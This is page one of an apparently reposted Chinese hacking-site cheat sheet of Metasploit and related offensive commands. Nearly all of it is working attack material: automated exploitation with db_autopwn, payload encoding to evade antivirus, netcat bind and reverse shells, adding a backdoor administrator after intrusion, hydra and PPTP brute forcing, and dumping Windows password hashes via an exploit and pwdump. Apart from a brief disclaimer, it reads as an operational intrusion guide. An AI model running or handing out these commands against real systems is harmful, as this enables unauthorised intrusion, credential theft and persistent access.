欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

metasploit 常用指令

来源:本站转载 作者:佚名 时间:2013-07-09 TAG:metasploit 我要投稿

 svn update #升级 
./msfweb #Web接口127.0.0.1:55555。.
./msfconsole #字符下的Console。
help #帮助
show <option> #显示选项
search <name> #搜索名字
use <exploit name> #使用漏洞
show options #显示选项
set <OPTION NAME> <option> #设置选项
show payloads #显示装置
set PAYLOAD <payload name> #设置装置
show options 显示选项
set <OPTION NAME> <option> #设置选项
show targets #显示目标(os版本)
set TARGET <target number> #设置目标版本
exploit #开始漏洞攻击
sessions -l #列出会话
sessions -i <ID> #选择会话
sessions -k <ID> #结束会话
<ctrl> z #把会话放到后台
<ctrl> c #结束会话
jobs #列出漏洞运行工作
jobs -K #结束一个漏洞运行工作
show auxiliary #显示辅助模块
use <auxiliary name> #使用辅助模块
set <OPTION NAME> <option> #设置选项
run #运行模块
scanner/smb/version #扫描系统版本
scanner/mssql/mssql_ping #测试mssql是否在线
scanner/mssql/mssql_login #测试登录(暴力或字典)
Attacker behind firewall: bind #shell正向
Target behind firewall: reverse #shell反向
db_import_nessus_nbe #加载nessus的扫描结果
db_import_nmap_xml #加载nmap的扫描结果
自动化攻击流程: 
修复Metasploit v4.2.0 ,启用db_autopwn命令问题.
下载db_autopwn复制到/opt/framework3/msf3/plugins/后解决。
下载地址:http://dl.vmall.com/c04w8czlcj
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest
db_create pentest
db_nmap targetIP
db_hosts
db_services
db_autopwn -t -p -e
编码处理[免杀]:
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00′-l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00′-e PexFnstenvMor -t c
入侵后在Windows下添加管理员用户:
hostname #查看主机名
net users #查看用户
net user #用户密码/add 添加用户
net localgroup #查看工作组
net localgroup administrators #查看管理员组
net localgroup administrators x /add #将用户加入管理员组
TFTP:
cp /pentest/windows-binaries/tools/nc.exe /tmp/ #传递到tftp上
tftp -i 10.1.1.2 GET nc.exe #下载
Netcat瑞士军刀:
attacker: 10.1.1.1
target: 10.1.1.2
nc -v -z 10.1.1.2 1-1024 #端口扫描
target: nc -lvp 4444 #聊天设置(服务)
attacker: nc -v 10.1.1.2 4444 #聊天设置(客户)
target: nc -lvp 4444 > output.txt #传输文件(接受)
attacker: nc -v 10.1.1.2 4444 < test.txt #传输文件(发送)
target: nc -lvp 4444 -e cmd.exe  #Bind shell。
attacker: nc -v 10.1.1.2 4444
target:nc -lvp 4444  #Reverse shell。
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
暴力破解:
hydra -l ftp -P words -v targetIP ftp #攻击ftp。
hydra -l muts -P words -v targetIP pop3 #攻击pop3
hydra -P words -v targetIP snmp #攻击snmp
攻击Microsof VPN:
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
wget -r www.target.com –accept=pdf #下载pdf文档
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM文件(windows下的密码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份Windows的Hash文件:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:windowssystem32
meterpreter > execute -f cmd -c
meterpreter > interact x
C:\WINDOWSsystem32> pwdump 127.0.0.1
Metasploit终端命令
show exploits #列出metasploit框架中的所有渗透攻击模块。
show payloads #列出metasploit框架中的所有攻击载荷。
show auxiliary #列出metasploit框架中的所有辅助攻击载荷。
search name #查找metasploit框架中所有的渗透攻击和其他模块。
info #展示出制定渗透攻击或模块的相关信息。
use name #装载一个渗透攻击或模块。
LHOST #你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。
RHOST #远程主机或是目标主机。
set function #设置特定的配置参数(EG:设置本地或远程主机参数)。
setg function #以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。
show options #列出某个渗透攻击或模块中所有的配置参数。
show targets #列出渗透攻击所有支持的目标平台。
set target num #指定你所知道的目标的操作系统以及补丁版本类型。
set payload name #指定想要使用的攻击载荷。
show advanced #列出所有高级配置选项。
set autorunscript migrate -f. #在渗透攻击完成后,将自动迁移到另一个进程。
check #检测目标是否选定渗透攻击存在相应的安全漏洞。
exploit #执行渗透攻击或模块来攻击目标。
exploit -j #在计划任务下进行渗透攻击(攻击将在后台进行)。

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载